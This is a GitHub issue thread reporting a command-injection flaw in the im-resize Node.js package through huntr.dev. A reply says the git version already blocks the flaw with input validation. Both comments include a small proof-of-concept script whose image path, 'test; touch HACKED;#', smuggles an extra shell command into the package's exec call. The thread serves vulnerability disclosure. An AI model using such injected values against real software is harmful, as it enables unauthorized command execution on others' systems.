Turistforeningen/node-im-resize

huntr.dev - Command Injection

huntr-helper opened this issue · 1 comments

huntr-helper commented

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

Vulnerability Description

The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115

Steps To Reproduce:

  1. Create the following PoC file:
// poc.js
var resize = require('im-resize');

var image = {
  path: 'test; touch HACKED;#',
  width: 5184,
  height: 2623
};
 
var output = {
  versions: [{
    suffix: '-thumb',
    maxHeight: 150,
    maxWidth: 150,
    aspect: "3:2"
  },{
    suffix: '-square',
    maxWidth: 200,
    aspect: "1:1"
  }]
};
 
resize(image, output, function(error){console.log()});
  1. Check there aren't files called HACKED
  2. Execute the following commands in another terminal:
npm i im-resize # Install affected module
node poc.js #  Run the PoC
  1. Recheck the files: now HACKED has been created

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

alromh87 commented

NPM version is vulnerable but I this bug is a false positive for git version, since code injection is mitigated in:

https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L10

In commit de624da of Feb 3

Instead of using npm version test should be executed against git version, after cloning like:

// poc.js
//var resize = require('im-resize');
var resize = require('./');

var image = {
  path: 'test; touch HACKED;#',
  width: 5184,
  height: 2623
};
 
var output = {
  versions: [{
    suffix: '-thumb',
    maxHeight: 150,
    maxWidth: 150,
    aspect: "3:2"
  },{
    suffix: '-square',
    maxWidth: 200,
    aspect: "1:1"
  }]
};
 
resize(image, output, function(error){console.log()});

execute by:

npm i aspectratio # Install requiered module
node poc.js #  Run the PoC

Will yield:

Input Validation failed, Suspicious Characters found

stopping execution and avoiding code injection

exec is called in https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L13 so trying to call directly https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115 will produce a string and not code execution.

PS. I would suggest granting the bounty considering the time it took me to test and document this as well as helping improve huntr bug quality